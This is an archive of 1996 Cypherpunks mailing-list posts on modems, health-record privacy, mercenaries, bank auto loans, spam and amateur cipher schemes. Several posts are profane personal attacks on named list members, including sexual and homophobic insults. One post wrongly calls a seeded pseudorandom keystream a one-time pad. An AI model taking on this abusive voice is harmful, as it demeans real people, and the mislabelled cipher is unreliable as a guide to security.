year. And Treasury Secretary > Robert Rubin convened a conference of 29 nations in December 1995 to > focus on the money laundering problem. > > One committee member, Rep. Maxine Waters, D-Calif., addressed the > political context of the hearings. > > Waters said she was suspicious that the Republican-led Congress was > holding ''a rash of hearings this month ...
on the subject of drugs just > as Presidential candidate Dole tries to use the issue as part of his > campaign strategy against President Clinton.'' > > Waters said if the GOP-led House ''is truly serious about the impact of > drugs'' it should hold hearings about charges raised in a San Jose > Mercury News investigative series last month concerning the role > CIA-backed rebels in Nicaragua played in bringing crack cocaine and > weapons to Los Angeles and other cities. > > Bachus told Waters the hearing wasn't motivated by politics and that he > had personally been involved in anti-drug efforts prior to his election > to Congress. > > --- > > Dr.Dimitri Vulis KOTM Fuckhead. From craigw at dg.ce.com.au Wed Sep 18 20:39:41 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Thu, 19 Sep 1996 11:39:41 +0800 Subject: 56 kbps modems Message-ID: <199609190039.KAA20049@mac.ce.com.au> >Interesting. . . Oh well, I bet their competition doesn't mind. That is the major problem. We have only 2 carriers in this country. The market is not being deregulated until mid 97. Optus the other carrier has only just installed local access (rather than STD, ISDN only) and it covers ~ 11% of the population with this service. The other problem is that they use lines leased from telstra as many councils and communities are complaining about the laying of new cables (arrr joe public). In a recent case where optus decided to try and lay the cables against council wishes the council impounded several of the vehicles used. Is it not great to live in the "lucky country". Here in Au we seem to delight in first complaining of the poor line quality, and then stop new lines being installed Craig ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products.
aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From mthompso at qualcomm.com Wed Sep 18 20:48:52 1996 From: mthompso at qualcomm.com (Michelle Thompson) Date: Thu, 19 Sep 1996 11:48:52 +0800 Subject: Assassination Politics, is now Mercenarial Stuff Message-ID: <2.2.32.19960919011631.002f9c0c@strange.qualcomm.com> >From: kwheeler at intellinet.com >Date: Wed, 18 Sep 1996 20:08:18 -0500 >X-Sender: kwheeler at intellinet.com >To: Michelle Thompson >Subject: Re: Assassination Politics, is now Mercenarial Stuff > >Loosely the term mercenary means one who does a job solely for >profit. Technically, as outlined in Article 47 of Protocol I >Additional to the Geneva Convention of 1949: > >" 2. A mercenary is a person who: > > (a) is specially recruited locally or abroad in order to > fight in an armed conflict; > > (b) does, in fact, take a direct part in the hostilities; > > (c) is motivated to take part in the hostilities by the desire > for private gain, and, in fact, is promised by or on behalf > of a party to the conflict, material compensation substantially > in excess of that promised or paid to combatants of _similar_ > ranks (my added emphasis -KMW) and functions in the armed forces > of that party; > > (d) is neither a national of a party to the conflict nor a resident of > territory controlled by a party to the conflict; > > (e) is not a member of the armed forces of a party to the conflict; >" > > >The foreign legions of France, Spain, and Libya are considered to be >part of the armed forces of those nations, and therefore, strictly speaking, >personnel enlisted in these forces are _not_ mercenaries.
> >I had to go dig that info up to see if I had remembered things >somewhat correctly... > >-K > > > From dlv at bwalk.dm.com Wed Sep 18 20:50:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 11:50:17 +0800 Subject: [NEWS] Message-ID: American Banker, 9/17/96 CHASE TO OFFER DEALERSHIPS AUTO LOAN DECISIONS OVER INTERNET Chase Manhattan Corp.'s auto financing division has begun using the Internet to provide dealerships with loan-approval decisions. The bank is the first of eight financial institutions that have committed to using the system, developed by IBM Corp. By computerizing loan applications and sending data electronically, Chase officials said the bank can grant approvals in as few as two minutes. Up to 50% of the division's auto loans will be running through the system within the next 18 months. Chase, the largest car lender not affiliated with a car company, is connected to six dealerships currently using the system and will establish connections to 100 dealers with the official introduction in October. Other financial institutions planning to use the on-line system include NationsBank Corp., G.E. Capital Auto Financial Services Inc., Regions Financial Corp., and Citibank Puerto Rico. The dealer's computer is connected to the Internet through the IBM Global Network, which is also used to retrieve an encrypted report from a credit bureau. The dealer's pre-established "key" decodes the report and causes the screen to display one, two, or three stars -- representing poor, fair, or good credit. This gives the dealer an idea of which financial institutions are most likely to approve the loan. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From vznuri at netcom.com Wed Sep 18 20:55:32 1996 From: vznuri at netcom.com (Vladimir Z.
Nuri) Date: Thu, 19 Sep 1996 11:55:32 +0800 Subject: GAK, GAP, GAY In-Reply-To: Message-ID: <199609190117.SAA04924@netcom21.netcom.com> > >On a related note, I read an article yesterday about the proposed new >Health Data Base, with all encounters with any medical institution or any >health care provider of any sort being cross-linked and cross-referenced. >The privacy concerns are supposedly handled by having "security tickets" >for various hospital officials, researchers (!!), insurance companies, and >law enforcement. (I put the "!!" next to the "researchers" because I don't >recall releasing my medical and dietary history to any so-called >"researchers." While I have no doubt that many "data miners" would like >access to such national data bases, and that some potentially valuable >information could be gleaned, I didn't release this information for Joe >Gradstudent, Ph.D. candidate to sift through.) its worth noting that mapping the human genome is related to health records and privacy issues. essentially scientists have made tremendous progress in mapping out what diseases are caused by what genes. much of this is done with the power of correlating gene mutations with actual health records among the population, the more the better. science progresses on openness. there are legitimate reasons to have large databases of private records. I do believe such things could be accomplished while protecting the privacy of individuals yet giving the benefits to researchers. imagine the concepts of blinding and zero-knowledge protocols applied to health databases. it seems reasonable that this can be worked out. one interesting idea: imagine a system in which "blinding" is an accepted and basic form of interaction between patients and doctors. the patients give only a self-generated ID to the health care provider. 
the system is set up such that the provider can do all functions necessary to them (keeping records, billing the insurance company) through the "blinding" process. this has a lot of potential. it seems that we could take the blinding process and possibly push for it to be an accepted way of doing business. there's a lot of use for someone to do what Chaum has done for digital cash, i.e. show that all operations necessary to commerce can be supported via blinding-- taking that kind of mapping, and moving it into all other areas of human endeavor. even just rewriting his own papers to be specific to particular fields like the health arena would be a breakthrough at the moment. p.s. I fail to see why calling you "timmy" is considered an ad hominem attack. quite to the contrary, I assure you it is a term of endearment From declan at well.com Wed Sep 18 20:56:22 1996 From: declan at well.com (Declan McCullagh) Date: Thu, 19 Sep 1996 11:56:22 +0800 Subject: 56 kbps modems Message-ID: >From "Technical Aspects of Data Communications" by John E. McNamara: BAUD: A unit of signaling speed equal to the number of discrete conditions or signal events per second. In asynchronous transmission, the unit of signaling speed corresponding to one unit interval per second; that is, if the duration of the unit interval is 20 milliseconds, the signaling speed is 50 baud. Baud is the same as "bits per second" only if each signal event represents exactly one bit. A baud is the reciprocal of the unit interval. In other words, McNamara says (p148), in common 2400 bps modems, the "baud rate" is 1200 baud. -Declan Chris writes: >On Mon, 16 Sep 1996 12:16:08 +0200, Gary Howland wrote: > >>craigw at dg.ce.com.au wrote: >>> well here in Australia Telstra our national carrier only "garantees" >>> 2400 baud to work. >>As I am sure has been discussed at length before, baud does not equal >>bps. AFAIK, V32bis is only 2400baud. >This is correct. 
The difference is in the number of values for each of the >2400 signals sent per second. > ># Chris Adams | >http://www.io-online.com/adamsc/adamsc.htp ># cadams at acucobol.com | V.M. (619)515-4894 >"I have never been able to figure out why anyone would want to play games on >a computer in any case when the whole system is a game. Word processing, >spreadsheets, telecoms -- it's all a game. And they pay you to play it." > -- Duncan Frissell From dlv at bwalk.dm.com Wed Sep 18 21:11:02 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 12:11:02 +0800 Subject: A Bizarre Increase in the Ad Hominems Here In-Reply-To: <199609181415.AA21481@crl11.crl.com> Message-ID: >From varange at crl.com Wed Sep 18 10:24:36 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:12 EDT for dlv Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA18840 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:24:36 -0400 Received: from crl11.crl.com by mail.crl.com with SMTP id AA06256 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:25:04 -0700 Received: by crl11.crl.com id AA21481 (5.65c/IDA-1.5); Wed, 18 Sep 1996 07:15:24 -0700 From: Troy Varange Message-Id: <199609181415.AA21481 at crl11.crl.com> Subject: Re: A Bizarre Increase in the Ad Hominems Here To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 07:15:24 -0700 (PDT) In-Reply-To: from "Dr.Dimitri Vulis KOTM" at Sep 18, 96 08:03:04 am X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1107 > tcmay at got.net (Timmy May) (fart) writes: > > * Detweiler (vznuri at netcom.com) writes: > > Detweiler is much smarter than VZNuri (or Timmy). I don't think Timmy > believes his own lies. > > > (Sadly, a large fraction of the women who have posted on our list have > > written in this same kind of incoherent, rambling, makes-no-sense kind of > > style. 
I have no idea why the percentage of such events is so high.) > > Is Timmy gay? Why does he hate women so much? > > > * And of course Vulis has been posting his "farting" messages far and wide. > > Recently, 3 people in the computer security field have independently > told me that Timmy May approached them "off-list" to complain about > things I supposedly say on the Internet - most of which I never said. > When I asked about it on this mailing list, Timmy posted what was shown > to be a lie (about his complaint to Kelly Goen.) Timmy is known as a > nutcase and a liar - if he keeps up his "character assassination" > attacks, the only reputation he hurts is his own. > > Dr.Dimitri Vulis KOTM Fuckhead. From wombat at mcfeely.bsfs.org Wed Sep 18 21:32:06 1996 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Thu, 19 Sep 1996 12:32:06 +0800 Subject: GAK, GAP, GAY In-Reply-To: Message-ID: > On a related note, I read an article yesterday about the proposed new > Health Data Base, with all encounters with any medical institution or any > health care provider of any sort being cross-linked and cross-referenced. > The privacy concerns are supposedly handled by having "security tickets" > for various hospital officials, researchers (!!), insurance companies, and > law enforcement. (I put the "!!" next to the "researchers" because I don't > recall releasing my medical and dietary history to any so-called > "researchers." While I have no doubt that many "data miners" would like > access to such national data bases, and that some potentially valuable > information could be gleaned, I didn't release this information for Joe > Gradstudent, Ph.D. candidate to sift through.) Don't get me wrong - I'm not disagreeing with you about how grim your points are. 
I just wanted to point out that information "could" be released to researchers without identifying the patient - researchers are generally interested in statistical data, such as the incidence of cancer per zip code, etc., which doesn't require your name to be released. Zip codes are sufficiently populated that this probably is of no danger to privacy. OTOH, the potential for mis-use of such records is high, and allowing access to a huge number of commercial sites, and their employees, certainly opens a lot of holes. - r.w. From dlv at bwalk.dm.com Wed Sep 18 21:43:40 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 12:43:40 +0800 Subject: [joke, non-code] Re: Get this for a snake-oil example :) In-Reply-To: Message-ID: f_estema at alcor.concordia.ca writes: > Shamster: SHA-enabled biocomputing hamster. I'm sure Timmy would like to wrap one up in duct tape and shove it up his ass... --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From hua at chromatic.com Wed Sep 18 21:46:19 1996 From: hua at chromatic.com (Ernest Hua) Date: Thu, 19 Sep 1996 12:46:19 +0800 Subject: Interesting article in Upside ... 
Message-ID: <199609190203.TAA22357@ohio.chromatic.com> Article on the political side of crypto with respect to this year's election: http://www.upside.com/print/oct96/election.html Ern From dlv at bwalk.dm.com Wed Sep 18 21:46:53 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 12:46:53 +0800 Subject: Fuckhead In-Reply-To: <199609181408.AA21359@crl11.crl.com> Message-ID: >From varange at crl.com Wed Sep 18 10:09:35 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 11:07:01 EDT for dlv Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA17484 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400 Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230 (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:02 -0700 Received: by crl11.crl.com id AA21359 (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:08:08 -0700 From: Troy Varange Message-Id: <199609181408.AA21359 at crl11.crl.com> Subject: Fuckhead To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT) Priority: Fuckhead Precedence: Fuckhead Reply-To: dlv at bwalk.dm.com In-Reply-To: X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 10 Fuckhead. From craigw at dg.ce.com.au Wed Sep 18 21:50:11 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Thu, 19 Sep 1996 12:50:11 +0800 Subject: Spam blacklist project Message-ID: <199609190217.MAA23297@mac.ce.com.au> What...only half ;) > Half the population doesn't care who their masters are, as long as they > have masters that tell them what to do. > > --Lucky > ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. 
aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From dlv at bwalk.dm.com Wed Sep 18 21:51:17 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 12:51:17 +0800 Subject: Fuckhead In-Reply-To: <199609190131.SAA12134@dfw-ix7.ix.netcom.com> Message-ID: >From xreznorx at ix.netcom.com Wed Sep 18 21:32:01 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Wed, 18 Sep 96 22:11:56 EDT for dlv Received: from dfw-ix7.ix.netcom.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA27000 for dlv at bwalk.dm.com; Wed, 18 Sep 96 21:32:01 -0400 Received: from (xreznorx at dby-ct1-15.ix.netcom.com [205.186.164.47]) by dfw-ix7.ix.netcom.com (8.6.13/8.6.12) with SMTP id SAA12134 for ; Wed, 18 Sep 1996 18:31:52 -0700 Date: Wed, 18 Sep 1996 18:31:52 -0700 Message-Id: <199609190131.SAA12134 at dfw-ix7.ix.netcom.com> From: xreznorx at ix.netcom.com (The ReznoR) Subject: Re: Fuckhead To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) uh, who the fuck r u? 
You wrote: > >>From varange at crl.com Wed Sep 18 10:09:35 1996 >Received: by bwalk.dm.com (1.65/waf) > via UUCP; Wed, 18 Sep 96 11:07:01 EDT > for dlv >Received: from mail.crl.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; > id AA17484 for dlv at bwalk.dm.com; Wed, 18 Sep 96 10:09:35 -0400 >Received: from crl11.crl.com by mail.crl.com with SMTP id AA03230 > (5.65c/IDA-1.5 for ); Wed, 18 Sep 1996 07:10:02 -0700 >Received: by crl11.crl.com id AA21359 > (5.65c/IDA-1.5 for dlv at bwalk.dm.com); Wed, 18 Sep 1996 07:08:08 -0700 >From: Troy Varange >Message-Id: <199609181408.AA21359 at crl11.crl.com> >Subject: Fuckhead >To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Date: Wed, 18 Sep 1996 07:08:08 -0700 (PDT) >Priority: Fuckhead >Precedence: Fuckhead >Reply-To: dlv at bwalk.dm.com >In-Reply-To: >X-Mailer: ELM [version 2.4 PL23] >Mime-Version: 1.0 >Content-Type: text/plain; charset=US-ASCII >Content-Transfer-Encoding: 7bit >Content-Length: 10 > >Fuckhead. > From dlv at bwalk.dm.com Wed Sep 18 22:05:14 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Thu, 19 Sep 1996 13:05:14 +0800 Subject: A daily warning regarding Timothy C. May In-Reply-To: Message-ID: Sandy Sandfort writes: > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > SANDY SANDFORT > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > > C'punks, > > On Wed, 18 Sep 1996, Anonymous wrote: > > > Timothy C. May is a lying sack of shit. > > I've never known Tim to lie. I agree with Anon - Timmy (fart) is a lying sack of shit. I caught him "complaining" to various people in the computer security industry about what I write on the 'net - and he attributes shit to me that I knows I never wrote. That's lie #1. When confronted with evidence, Timmy further lied about his communication with one of these people. He's a sad piece of work. > Back under your rock, anonymous. Yes - please, don't send a *daily* Timmy shit to this mailing list. 
This used to be a good forum to discuss crypto. Timmy doesn't know much about crypto, so he's been spamming it with his libertarian crap. Please don't contribute more shit than we already get from Timmy. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From /dev/null at dhp.com Wed Sep 18 22:21:52 1996 From: /dev/null at dhp.com (Anonymous) Date: Thu, 19 Sep 1996 13:21:52 +0800 Subject: The daily warning about Timothy May, the ignorant buffoon Message-ID: <199609190246.WAA07624@dhp.com> Timothy May is widely recognized on the net, because of his frequent vitriolic postings, as someone/thing ready to cut off his own penis to spite the testicles, although his few real-world friends recognize him better from the rear. From wb8foz at nrk.com Wed Sep 18 22:31:12 1996 From: wb8foz at nrk.com (David Lesher) Date: Thu, 19 Sep 1996 13:31:12 +0800 Subject: Mercenaries In-Reply-To: Message-ID: <199609190334.XAA30084@nrk.com> Timothy C. May sez: > > As to Michelle's point that Americans cannot serve for pay in other > militaries, there are all sorts of waivers and "look the other way"s > involved. For example, the retired American officer who became the top > military man in Estonia (or one of the Baltic States)--while still > retaining his U.S. citizenship. But at the loss of his pension, as I recall. > Israel is one of several states which the U.S. allows dual citizenship > with. Not true at all. Read Rich Wales Dual-Cit FAQ. -- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close........[v].(301) 56-LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead....................................20915-1433 From paul at fatmans.demon.co.uk Wed Sep 18 22:50:24 1996 From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk) Date: Thu, 19 Sep 1996 13:50:24 +0800 Subject: OTP seed solution? - strong, tried before??? 
Message-ID: <842976406.25087.0@fatmans.demon.co.uk> A very simple idea came to me today that I`m sure has been done before and I wanted to find out if it has any problems I haven`t seen: A strong random generator (ie. a BBS) is seeded with a true random seed (derived possibly from keyboard latency) and used each time a message is sent to create a message length random string. This string is XOR`d or added to the message creating an OTP. The recipient has previously been sent a seed value for the generator encrypted under say RSA and signed to prevent a man in the middle attack. Each set of recipient<->sender pairs has a seed unique to them. This seems good to me but the key distribution mess (ie. hundreds of keys about) is the big problem, has anyone done any research into possible solutions to this??? Datacomms Technologies web authoring and data security Paul Bradley, Paul at fatmans.demon.co.uk Http://www.fatmans.demon.co.uk/crypt/ "Don`t forget to mount a scratch monkey" From Adamsc at io-online.com Wed Sep 18
23:02:02 1996 From: Adamsc at io-online.com (Adamsc) Date: Thu, 19 Sep 1996 14:02:02 +0800 Subject: XPA_nix Message-ID: <19960919034825859.AAA177@GIGANTE> On Wed, 18 Sep 1996 12:22:10 -0400, Perry E. Metzger wrote: >> > Cheswick opines,"This is the first major attack of a kind that I believe to >> > be the final Internet security problem." >> Harrumph. We should only BE so lucky. >I don't remember if Ches was quoted correctly, but its more or less >true -- we know how to deal with most classes of major problems, but >denial of service is still a major question mark. I suspect its the >last big frontier. Hopefully it will die out if things ever switch over to a digicash payment scheme. Then only the big guys would mess with it... # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # cadams at acucobol.com | V.M. (619)515-4894 "I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it." -- Duncan Frissell From asgaard at Cor.sos.sll.se Wed Sep 18 23:06:45 1996 From: asgaard at Cor.sos.sll.se (Asgaard) Date: Thu, 19 Sep 1996 14:06:45 +0800 Subject: The Near-Necessity of Health Insurance In-Reply-To: <01I9MKL4PCX48Y4YUZ@mbcl.rutgers.edu> Message-ID: On Wed, 18 Sep 1996, E. Allen Smith wrote: > While this is certainly your business, I would suggest at least >one physical a year, including blood work, as a good preventative measure... >I believe it _has_ been shown to extend lives; I can do a Medline lookup if >desired. Save yourself the trouble. 
To _show_ such a thing one would have to: 1) get some 10.000 persons, chosen 'randomly' (at least not chosen when they have already consulted medical professionals) to willingly participate in the study and accept whatever group they would be coin-tossed into 2) randomize them into two groups of 5000 each 3) have one group checked annually and the other group not checked 4) wait 20-50 years 5) compare the groups for mortality Without consulting Medline I can tell you that such a study has not and will never be done. And all other approaches to try to prove such a thing could be heavily criticized for likely bias. Health tests, especially 'blood work', are done for profit, with very little, if anything at all, to gain for the subjects. (There are a few possible exceptions, f ex PAP-smears. Blood pressure is more doubtful and cholesterol is a joke. But I'm not going to argue on the details in this forum.) Asgaard From barrk at alias.cyberpass.net Thu Sep 19 14:22:58 1996 From: barrk at alias.cyberpass.net (Barry K.) Date: Thu, 19 Sep 1996 14:22:58 -0700 (PDT) Subject: Bernstein hearing reminder: [..] Message-ID: <199609192042.NAA16104@sirius.infonex.com> Part 1 The Batman part On Sep 19, 9:24am, Batman wrote: > Subject: RE: Bernstein hearing reminder: THIS Friday 11:45AM, SF Federal B >For the 200th time, unsubscribe me of your fucked mail lists. > >-- End of excerpt from Batman Part 2 James wrote: >Apologies if you receive more than one copy of this message, but >I'm auto-replying to your message to handle the flood: I had only one copy, James, but it was good. >Redistribution to the list from which you originally received >the problem message is kindly requested. Which list was that, James? >Thank you for bringing this matter to our attention. The email >or posting you have seen falsely represents Smith Barney and its >employees.
These are erroneous postings that did not originate >from anyone employed by our firm, and therefore we cannot >directly stop them from occurring. However we have advised the >companies we believe to have serviced the originator of these >messages and we are pursuing all possible steps to end this >fraud. Unfortunately some people abuse the Internet and we >regret any inconvenience they may have caused you. Thats good, James. As the FBI man said: I smelled a rat and I nipped it in the bud. >There are currently no mailing lists maintained in the smb.com >domain, so you were not subscribed to any list. If you receive >any further messages of this nature, they are the product of the >same spurious source. Thats the word. Spuvious. >We're sorry for any inconvenience you may have experienced as a >result of this unfortunate abuse of the 'Net. No inconvenience, James. No inconvenience, at all. >Further queries via email to postmaster at smb.com please. Direct your replies to: cypherpunks-announce at toad.com This list is a must for all people in the Arctic, the plains of Mongolia and the North West territories, who want to be kept "ajour" of the dressinghabits of the natives in California. Barry From dsmith at prairienet.org Wed Sep 18 23:31:18 1996 From: dsmith at prairienet.org (David E. Smith) Date: Thu, 19 Sep 1996 14:31:18 +0800 Subject: a simple cypher scheme Message-ID: <199609190415.XAA08538@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: sjohnson at packetengines.com, cypherpunks at toad.com Date: Wed Sep 18 23:06:32 1996 > i've been on cypherpunks for about a year a half now, and have > wacthed > many interesting threads pass by but i've never posited anything. 
what > has > brought me out into the open is this : i work for an engineering firm > doing > asic design, i use pgp ( as do all rational persons ), a co-worker here > has > come up with a 'cypher' scheme that he would like to use to send code to > our > clients. the scheme is this : he would take the file of code and pad > all > lines to the length of the longest line, he would then perform column > swaps, > and then row swaps, to 'mix up' the file. the person receiving the file > would then perform the opposite functions to recover the file. it seems > so > simple that it can't be good. i've convinced him to use pgp, but i > would > like some input if possible on why his cypher scheme is not a good one. > > thanx > Okay... well, in order to undo whatever was done (the column swaps and row swaps, and the pads), the formula has to be transmitted. Assuming that someone can intercept that as well as the alleged cyphertext, it's no-good. It's the whole "secure channel" issue. (Also, some information would have to be attached to the file containing the original end-of-lines for each line, or the padding will be difficult to tell from the legitimate code.) dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "The world's at stake. Don't confuse me with details." -- Captain America, "Onslaught" ...
famous last words From geeman at best.com Wed Sep 18 23:35:54 1996 From: geeman at best.com (geeman at best.com) Date: Thu, 19 Sep 1996 14:35:54 +0800 Subject: SPAMS Message-ID: <01BBA5A9.802E61C0@geeman.vip.best.com> ANY EMAIL ADDRESS PUBLISHED ON THE INTERNET THAT INVITES COMMERCIAL SOLICITATIONS IS DEEMED AS A COMMERCIAL ADDRESS, AND AS SUCH IS ELIGABLE FOR ETHICAL AND LEGAL EMAIL SOLICITATIONS FROM DIRECT ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ aye: there's the rub. and: don't trust anyone who can't spell. ELECTRONIC MAIL MARKETERS. IF FOR ANY REASON YOU OBJECT TO RECEIVING THIS MESSAGE PLEASE POLITELY REQUEST REMOVAL FROM MY LIST BY CLICKING ON THE REPLY BUTTON AND ENTERING "REMOVE" IN THE SUBJECT LINE. IF YOU DO NOT DO SO, I MUST ASSUME YOU WISH TO RECEIVE FURTHER MAILINGS. From tcmay at got.net Wed Sep 18 23:37:32 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 19 Sep 1996 14:37:32 +0800 Subject: GAK, GAP, GAY Message-ID: At 12:49 AM 9/19/96, Rabid Wombat wrote: >Don't get me wrong - I'm not disagreeing with you about how grim your >points are. I just wanted to point out that information "could" be >released to researchers without identifying the patient - researchers are >generally interested in statistical data, such as the incidence of cancer >per zip code, etc., which doesn't require your name to be released. Zip >codes are sufficiently populated that this probably is of no danger to >privacy. Fine, if they can convince me that of this, I may consent to letting them in on my secrets.
I surmise that asking permission of patients is not part of the plan, though. Secondly--and this is actually a crypto-related point (!)--it does not take much "blinded information" to figure out the correlations between patients and data. It obviously depends on the amount of information, but it's possible. (Recall similar arguments about the census data being sold to direct marketers: even with blinding of names, correlation was trivial in many cases. This caused even more people to simply state the number of (putative) living beings at their address and to "respectfully decline" to answer the detailed questions about racial makeup ("Mein Censusfuhrer, ich bin Aryan!"), income levels, diseases,insurance, employer, number of televisions, etc.) >OTOH, the potential for mis-use of such records is high, and allowing >access to a huge number of commercial sites, and their employees, >certainly opens a lot of holes. It will be a zoo. Tens of thousands of people will have access to one's records, and there will be no pretense that the system has even Clipper-like levels of protection. A psychotherapist acquaintance of mine is so worried about _existing_ lapses in patient-therapist confidentiality (basically, insurance companies are demanding detailed summaries of diagnoses and treatments, and demanding that he give them reports before they will pay...further evidence that those seeking treatment ought to pay cash and not have insurance companies in the loop on this sort of thing) that he has become and advocate of using PGP. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. 
"National borders aren't even speed bumps on the information superhighway." From unicorn at schloss.li Wed Sep 18 23:51:10 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 19 Sep 1996 14:51:10 +0800 Subject: SSN database scam? In-Reply-To: <2.2.32.19960918141242.006e9b48@super.zippo.com> Message-ID: On Wed, 18 Sep 1996, Jim Byrd wrote: > At 01:22 PM 9/18/96 +0200, Gary Howland forwarded: > >Forwarded from www-security mailing list. > [snip] > > >Can anybody comment on the item forwarded below my sig file? It claims > >there's a database w/ people's credit card no's etc on it and you have to > >give your name and social security number to get off of it. This strikes > >me as being a scam to get your ssn, but this went around at work and > >people are actually calling and giving it out. I know ssn's aren't really > >as secure as they're supposed to be, but still... > > I happen to work for Lexis-Nexis, but I don't speak for the company. Yes, > P-Trak is real, it was recently made available to our customers. > > It is NOT a scam to get SSNs. Lexis-Nexis is a large and reputable company, > best-known for its huge legal database system, Lexis. The Nexis side has > news reports from a large variety of sources. > > P-Trak originally made SSNs available, but Lexis-Nexis removed this feature > in response to protests. Is your information listed in the Lexis-Nexis database? > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From zinc at zifi.genetics.utah.edu Wed Sep 18 23:53:51 1996 From: zinc at zifi.genetics.utah.edu (zinc) Date: Thu, 19 Sep 1996 14:53:51 +0800 Subject: cfs users group dead? Message-ID: <199609190426.WAA20012@zifi.genetics.utah.edu> -----BEGIN PGP SIGNED MESSAGE----- hi, is the cfs-users at big.att.com list dead? i haven't seen anything for some time and mail i sent just bounced with a bad error. actually, i just got another one. two-for-one bounces if you mail through the cfs-users list! 
